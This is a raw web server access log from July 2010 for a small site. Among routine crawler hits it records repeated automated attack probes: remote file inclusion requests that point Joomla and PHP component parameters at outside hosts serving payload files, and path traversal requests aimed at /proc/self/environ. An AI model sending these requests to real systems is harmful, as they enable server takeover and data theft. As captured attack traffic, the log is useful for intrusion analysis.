66.163.171.207 - - [21/Jul/2010:19:22:25 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
208.80.193.40 - - [21/Jul/2010:19:23:16 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; SP/8.00/OnlineHTTPS)" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:19:24:56 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:19:25:02 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
217.73.227.60 - - [21/Jul/2010:19:30:09 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
217.73.227.60 - - [21/Jul/2010:19:30:09 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:19:32:13 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:19:33:07 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
67.195.115.240 - - [21/Jul/2010:19:41:04 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
67.195.115.240 - - [21/Jul/2010:19:41:04 -0700] "GET /blog/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
91.197.130.49 - - [21/Jul/2010:19:46:26 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.805" "www.redneckmba.com"
91.197.130.49 - - [21/Jul/2010:19:46:27 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.redneckmba.com"
119.192.145.131 - - [21/Jul/2010:20:15:38 -0700] "GET /skin_shop/standard/3_plugin_twindow/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.145.131 - - [21/Jul/2010:20:15:38 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.145.131 - - [21/Jul/2010:20:15:38 -0700] "GET /logs/access_100531.log//skin_shop/standard/3_plugin_twindow/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.195.115.240 - - [21/Jul/2010:20:22:11 -0700] "GET /logs/?N=D HTTP/1.0" 200 1923 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
93.114.41.85 - - [21/Jul/2010:20:27:54 -0700] "GET /logs/?option=com_ckforms&controller=http://dul4.fileave.com/Ckrid1.txt?? HTTP/1.1" 200 1939 "-" "plaNETWORK Bot Search" "www.redneckmba.com"
93.114.41.85 - - [21/Jul/2010:20:27:54 -0700] "GET /logs/access.log/?option=com_ckforms&controller=http://dul4.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
93.114.41.85 - - [21/Jul/2010:20:27:54 -0700] "GET /?option=com_ckforms&controller=http://dul4.fileave.com/Ckrid1.txt?? HTTP/1.1" 200 779 "-" "plaNETWORK Bot Search" "www.redneckmba.com"
67.205.67.73 - - [21/Jul/2010:20:30:37 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.805" "www.redneckmba.com"
67.205.67.73 - - [21/Jul/2010:20:30:37 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.redneckmba.com"
89.200.170.145 - - [21/Jul/2010:20:30:50 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.170.145 - - [21/Jul/2010:20:30:50 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.redneckmba.com"
91.197.130.49 - - [21/Jul/2010:20:30:56 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.805" "www.redneckmba.com"
91.197.130.49 - - [21/Jul/2010:20:30:56 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.redneckmba.com"
67.205.76.140 - - [21/Jul/2010:20:32:04 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "www.redneckmba.com"
67.205.76.140 - - [21/Jul/2010:20:32:04 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
188.127.248.175 - - [21/Jul/2010:20:32:26 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [21/Jul/2010:20:32:26 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.redneckmba.com"
93.114.41.85 - - [21/Jul/2010:20:32:40 -0700] "GET /?option=com_ckforms&controller=http://dul4.fileave.com/Ckrid1.txt?? HTTP/1.1" 200 779 "-" "plaNETWORK Bot Search" "www.redneckmba.com"
93.114.41.85 - - [21/Jul/2010:20:32:40 -0700] "GET /logs/?option=com_ckforms&controller=http://dul4.fileave.com/Ckrid1.txt?? HTTP/1.1" 200 1939 "-" "plaNETWORK Bot Search" "www.redneckmba.com"
93.114.41.85 - - [21/Jul/2010:20:32:41 -0700] "GET /logs/access.log/?option=com_ckforms&controller=http://dul4.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
67.205.76.140 - - [21/Jul/2010:20:32:52 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "www.redneckmba.com"
67.205.76.140 - - [21/Jul/2010:20:32:52 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
93.114.41.85 - - [21/Jul/2010:20:38:37 -0700] "GET /logs/?option=com_ckforms&controller=http://dul4.fileave.com/Ckrid1.txt?? HTTP/1.1" 200 1939 "-" "plaNETWORK Bot Search" "www.redneckmba.com"
93.114.41.85 - - [21/Jul/2010:20:38:37 -0700] "GET /logs/access.log/?option=com_ckforms&controller=http://dul4.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
93.114.41.85 - - [21/Jul/2010:20:38:37 -0700] "GET /?option=com_ckforms&controller=http://dul4.fileave.com/Ckrid1.txt?? HTTP/1.1" 200 779 "-" "plaNETWORK Bot Search" "www.redneckmba.com"
83.222.124.84 - - [21/Jul/2010:20:40:29 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "www.redneckmba.com"
83.222.124.84 - - [21/Jul/2010:20:40:29 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
83.222.124.84 - - [21/Jul/2010:20:40:37 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "www.redneckmba.com"
83.222.124.84 - - [21/Jul/2010:20:40:37 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
83.222.124.84 - - [21/Jul/2010:20:40:38 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "www.redneckmba.com"
83.222.124.84 - - [21/Jul/2010:20:40:38 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
83.222.124.84 - - [21/Jul/2010:20:40:54 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "www.redneckmba.com"
83.222.124.84 - - [21/Jul/2010:20:40:54 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
67.205.76.140 - - [21/Jul/2010:20:45:03 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "www.redneckmba.com"
67.205.76.140 - - [21/Jul/2010:20:45:03 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
67.205.76.140 - - [21/Jul/2010:20:45:54 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "www.redneckmba.com"
67.205.76.140 - - [21/Jul/2010:20:45:55 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
76.13.123.195 - - [21/Jul/2010:20:51:15 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.105 - - [21/Jul/2010:21:06:03 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.176.223.185 - - [21/Jul/2010:21:07:26 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
66.163.171.207 - - [21/Jul/2010:21:17:39 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
83.222.124.84 - - [21/Jul/2010:21:19:45 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "www.redneckmba.com"
83.222.124.84 - - [21/Jul/2010:21:19:45 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
83.222.124.84 - - [21/Jul/2010:21:19:49 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "www.redneckmba.com"
83.222.124.84 - - [21/Jul/2010:21:19:49 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
83.222.124.84 - - [21/Jul/2010:21:19:54 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "www.redneckmba.com"
83.222.124.84 - - [21/Jul/2010:21:19:54 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
83.222.124.84 - - [21/Jul/2010:21:20:01 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "www.redneckmba.com"
83.222.124.84 - - [21/Jul/2010:21:20:01 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
67.205.76.140 - - [21/Jul/2010:21:22:44 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "www.redneckmba.com"
67.205.76.140 - - [21/Jul/2010:21:22:44 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
67.205.76.140 - - [21/Jul/2010:21:22:57 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "www.redneckmba.com"
67.205.76.140 - - [21/Jul/2010:21:22:57 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:21:30:13 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:21:33:20 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:21:34:27 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:21:34:58 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
76.13.114.106 - - [21/Jul/2010:21:36:29 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.176.223.185 - - [21/Jul/2010:21:36:42 -0700] "GET /logs/ HTTP/1.0" 200 1923 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:21:40:37 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:21:43:15 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:21:45:31 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:21:45:36 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:21:53:41 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
66.163.171.205 - - [21/Jul/2010:21:55:33 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.176.223.185 - - [21/Jul/2010:21:57:54 -0700] "GET /logs/access.log HTTP/1.0" 200 365180 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
76.13.123.195 - - [21/Jul/2010:22:00:47 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.176.223.185 - - [21/Jul/2010:22:01:14 -0700] "GET /logs/access_100607.log HTTP/1.0" 200 564663 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:22:01:20 -0700] "GET /logs/access_100705.log HTTP/1.0" 200 850329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:22:03:07 -0700] "GET /logs/ HTTP/1.0" 200 1923 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:22:03:22 -0700] "GET /logs/access_100614.log HTTP/1.0" 200 93466 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
76.13.114.105 - - [21/Jul/2010:22:04:00 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.176.223.185 - - [21/Jul/2010:22:04:47 -0700] "GET /logs/scripts.log HTTP/1.0" 200 1456218 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:22:05:07 -0700] "GET /logs/access_100712.log HTTP/1.0" 200 722261 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:22:05:46 -0700] "GET /logs/access_100621.log HTTP/1.0" 200 483276 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:22:05:53 -0700] "GET /logs/access_100719.log HTTP/1.0" 200 817313 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:22:06:24 -0700] "GET /logs/ HTTP/1.0" 200 1923 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:22:07:04 -0700] "GET /logs/access_100613.log HTTP/1.0" 200 494608 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
91.197.130.49 - - [21/Jul/2010:22:06:56 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.805" "www.redneckmba.com"
91.197.130.49 - - [21/Jul/2010:22:06:56 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.redneckmba.com"
91.197.130.49 - - [21/Jul/2010:22:07:44 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.805" "www.redneckmba.com"
91.197.130.49 - - [21/Jul/2010:22:07:44 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:22:10:35 -0700] "GET /logs/ HTTP/1.0" 200 1923 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:22:10:37 -0700] "GET /logs/access_100628.log HTTP/1.0" 200 642474 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [21/Jul/2010:22:10:46 -0700] "GET /logs/ HTTP/1.0" 200 1923 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
208.80.193.38 - - [21/Jul/2010:22:19:25 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sensis; .NET CLR 1.1.4322)" "redneckmba.com"
188.64.184.81 - - [21/Jul/2010:22:21:31 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://jimbran.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.64.184.81 - - [21/Jul/2010:22:21:31 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://jimbran.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.64.184.81 - - [21/Jul/2010:22:21:31 -0700] "GET /logs/access.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://jimbran.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.107 - - [21/Jul/2010:22:32:17 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [21/Jul/2010:22:34:20 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
91.201.66.42 - - [21/Jul/2010:22:39:17 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.redneckmba.com"
91.201.66.42 - - [21/Jul/2010:22:39:17 -0700] "GET / HTTP/1.0" 200 763 "http://www.redneckmba.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.redneckmba.com"
188.64.184.81 - - [21/Jul/2010:22:44:24 -0700] "GET /logs/access.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://jimbran.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
72.55.153.180 - - [21/Jul/2010:22:57:54 -0700] "GET /logs/index.php?option=com_fabrik&controller=http://www.joomla4hire.com/data/crot1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
72.55.153.180 - - [21/Jul/2010:22:57:54 -0700] "GET /logs/access.log%20%20/index.php?option=com_fabrik&controller=http://www.joomla4hire.com/data/crot1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
72.55.153.180 - - [21/Jul/2010:22:57:54 -0700] "GET /index.php?option=com_fabrik&controller=http://www.joomla4hire.com/data/crot1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
76.13.123.195 - - [21/Jul/2010:22:58:44 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [21/Jul/2010:23:00:51 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.18.201.205 - - [21/Jul/2010:23:01:35 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
216.18.201.205 - - [21/Jul/2010:23:01:35 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
216.18.201.205 - - [21/Jul/2010:23:01:35 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
66.163.171.207 - - [21/Jul/2010:23:12:40 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.105 - - [21/Jul/2010:23:29:27 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.176.223.185 - - [21/Jul/2010:23:48:24 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
66.163.171.205 - - [21/Jul/2010:23:49:30 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [21/Jul/2010:23:55:15 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [21/Jul/2010:23:57:40 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
202.47.80.12 - - [22/Jul/2010:00:16:50 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [22/Jul/2010:00:16:50 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [22/Jul/2010:00:16:55 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [22/Jul/2010:00:16:56 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
